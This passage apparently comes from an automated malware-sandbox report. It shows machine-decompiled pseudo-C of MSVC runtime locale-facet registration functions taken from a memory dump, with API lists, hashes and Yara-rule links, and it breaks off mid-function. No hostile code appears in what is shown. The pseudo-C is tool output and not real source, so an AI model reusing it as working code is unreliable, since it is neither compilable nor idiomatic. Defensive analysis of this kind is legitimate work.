std::_Lockit::_Lockit.LIBCPMT ref: 6D48F8B6
int.LIBCPMT ref: 6D48F8CD

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F907
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F927
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F945

Strings

dmTm, xrefs: 6D48F8C1

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dmTm
API String ID: 651022567-953901710
Opcode ID: 36d0125369753ea98ddb29667e5ed46db8f7604b0a6350bbe0c50b56be51e05d
Instruction ID: ab6e7ad93bd3696d87385bf5079dfe02f036ad382b19390295b5b474e263dabd
Opcode Fuzzy Hash: 36d0125369753ea98ddb29667e5ed46db8f7604b0a6350bbe0c50b56be51e05d
Instruction Fuzzy Hash: 4111A0758082599BCF05EBA4C844EFDB7B5AF94314F2A400DD611AB396DB74DD01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6D49BB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t110 - 0x14, 0);
				_t105 =  *0x6d546e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6D46161C(0x6d546e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6D46171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6D4866BA(_t110 - 0x14);
					return E6D4A0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6D49C229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t110 - 0x20);
							E6D4A3D74(_t110 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t102, _t105, 0x14);
							E6D486653(_t110 - 0x14, 0);
							_t106 =  *0x6d546e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6D46161C(0x6d546e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6D46171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6D4866BA(_t110 - 0x14);
								return E6D4A0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6D49C295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6D461438(_t93);
										E6D4A3D74(_t110 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6d4ec414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6D49D028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6D4A0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6D486FD3(__eflags, _t103);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6d546e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6D486FD3(__eflags, _t102);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6d546e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6d49bb30
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb61
0x6d49bb66
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e

APIs

__EH_prolog3.LIBCMT ref: 6D49BB37
std::_Lockit::_Lockit.LIBCPMT ref: 6D49BB41
int.LIBCPMT ref: 6D49BB58

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49BB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BBD0

Strings

nTm, xrefs: 6D49BB4C

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: nTm
API String ID: 651022567-787157949
Opcode ID: b32afbc89ba0ca43d78a96455a4ab945ee81ab022d10d094033c5618211cf6b9
Instruction ID: 3114088dd5fee66572bf89503d02fda6ee92fdaa5d873c384fea41165dc266fc
Opcode Fuzzy Hash: b32afbc89ba0ca43d78a96455a4ab945ee81ab022d10d094033c5618211cf6b9
Instruction Fuzzy Hash: 6D11A075C082699BCF05EBA4C880EEEBBB5AF94314F2A450CD611BB395DB749E01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D49BBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t66 - 0x14, 0);
				_t63 =  *0x6d546e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D46161C(0x6d546e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D46171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D4866BA(_t66 - 0x14);
					return E6D4A0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D49C295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6D461438(_t55);
							E6D4A3D74(_t66 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d4ec414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D49D028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6D4A0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D486FD3(__eflags, _t61);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d546e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6d49bbd6
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc07
0x6d49bc0c
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14

APIs

__EH_prolog3.LIBCMT ref: 6D49BBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6D49BBE7
int.LIBCPMT ref: 6D49BBFE

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49BC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BC76

Strings

$nTm, xrefs: 6D49BBF2

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $nTm
API String ID: 651022567-2710144234
Opcode ID: 8deb32e77a89ad489fee399bc0a658ce65d823b2b31ee404dd5df68303e8d062
Instruction ID: 8a5fc3c45b8f434a5ef3327a055cd2c60954b5e7b6bb27b8a03e8d4bb37dd654
Opcode Fuzzy Hash: 8deb32e77a89ad489fee399bc0a658ce65d823b2b31ee404dd5df68303e8d062
Instruction Fuzzy Hash: F5118F75908219DBCF05EBA4C844FEEBBB5AF94314F2A400CD612AB291DF74AD01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t594 - 0x14, 0);
				_t567 =  *0x6d546dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6D46161C(0x6d546d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6D4866BA(_t594 - 0x14);
					return E6D4A0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6D4910BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t594 - 0x20);
							E6D4A3D74(_t594 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t553, _t567, 0x14);
							E6D486653(_t594 - 0x14, 0);
							_t568 =  *0x6d546df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6D46161C(0x6d546da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6D4866BA(_t594 - 0x14);
								return E6D4A0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6D491127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t594 - 0x20);
										E6D4A3D74(_t594 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t420, _t554, _t568, 0x14);
										E6D486653(_t594 - 0x14, 0);
										_t569 =  *0x6d546df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6D46161C(0x6d546da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6D4866BA(_t594 - 0x14);
											return E6D4A0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6D4911AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t594 - 0x20);
													E6D4A3D74(_t594 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t420, _t555, _t569, 0x14);
													E6D486653(_t594 - 0x14, 0);
													_t570 =  *0x6d546dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6D46161C(0x6d546d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6D4866BA(_t594 - 0x14);
														return E6D4A0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6D491230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t594 - 0x20);
																E6D4A3D74(_t594 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t420, _t556, _t570, 0x14);
																E6D486653(_t594 - 0x14, 0);
																_t571 =  *0x6d546dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6D46161C(0x6d546d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6D4866BA(_t594 - 0x14);
																	return E6D4A0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6D4912B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t594 - 0x20);
																			E6D4A3D74(_t594 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t420, _t557, _t571, 0x14);
																			E6D486653(_t594 - 0x14, 0);
																			_t572 =  *0x6d546dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6D46161C(0x6d546d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6D4866BA(_t594 - 0x14);
																				return E6D4A0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6D491339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t594 - 0x20);
																						E6D4A3D74(_t594 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t420, _t558, _t572, 0x14);
																						E6D486653(_t594 - 0x14, 0);
																						_t573 =  *0x6d546db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6D46161C(0x6d546d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6D4866BA(_t594 - 0x14);
																							return E6D4A0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6D4913A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t594 - 0x20);
																									E6D4A3D74(_t594 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t420, _t559, _t573, 0x14);
																									E6D486653(_t594 - 0x14, 0);
																									_t574 =  *0x6d546ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6D46161C(0x6d546d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6D4866BA(_t594 - 0x14);
																										return E6D4A0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6D491409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t594 - 0x20);
																												E6D4A3D74(_t594 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t420, _t560, _t574, 0x14);
																												E6D486653(_t594 - 0x14, 0);
																												_t575 =  *0x6d546de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6D46161C(0x6d546d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6D4866BA(_t594 - 0x14);
																													return E6D4A0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6D491471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t594 - 0x20);
																															E6D4A3D74(_t594 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t420, _t561, _t575, 0x14);
																															E6D486653(_t594 - 0x14, 0);
																															_t576 =  *0x6d546dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6D46161C(0x6d546da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6D4866BA(_t594 - 0x14);
																																return E6D4A0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6D4914EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t594 - 0x20);
																																		E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t420, _t562, _t576, 0x14);
																																		E6D486653(_t594 - 0x14, 0);
																																		_t577 =  *0x6d546dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6D46161C(0x6d546d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6D4866BA(_t594 - 0x14);
																																			return E6D4A0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6D491558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t594 - 0x20);
																																					E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t420, _t563, _t577, 0x14);
																																					E6D486653(_t594 - 0x14, 0);
																																					_t578 =  *0x6d546e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6D46161C(0x6d546dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6D4866BA(_t594 - 0x14);
																																						return E6D4A0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6D4915C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t594 - 0x20);
																																								E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t420, _t564, _t578, 0x14);
																																								E6D486653(_t594 - 0x14, 0);
																																								_t579 =  *0x6d546dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6D46161C(0x6d546d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6D4866BA(_t594 - 0x14);
																																									return E6D4A0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6D49162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6D461438(_t511);
																																											E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6d4ec0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6D49542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6D4A0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6D486FD3(__eflags, _t565);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6d546dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6D486FD3(__eflags, _t564);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6d546e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6D486FD3(__eflags, _t563);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6d546dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6D486FD3(__eflags, _t562);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6d546dfc = _t562;
																																		goto L68;
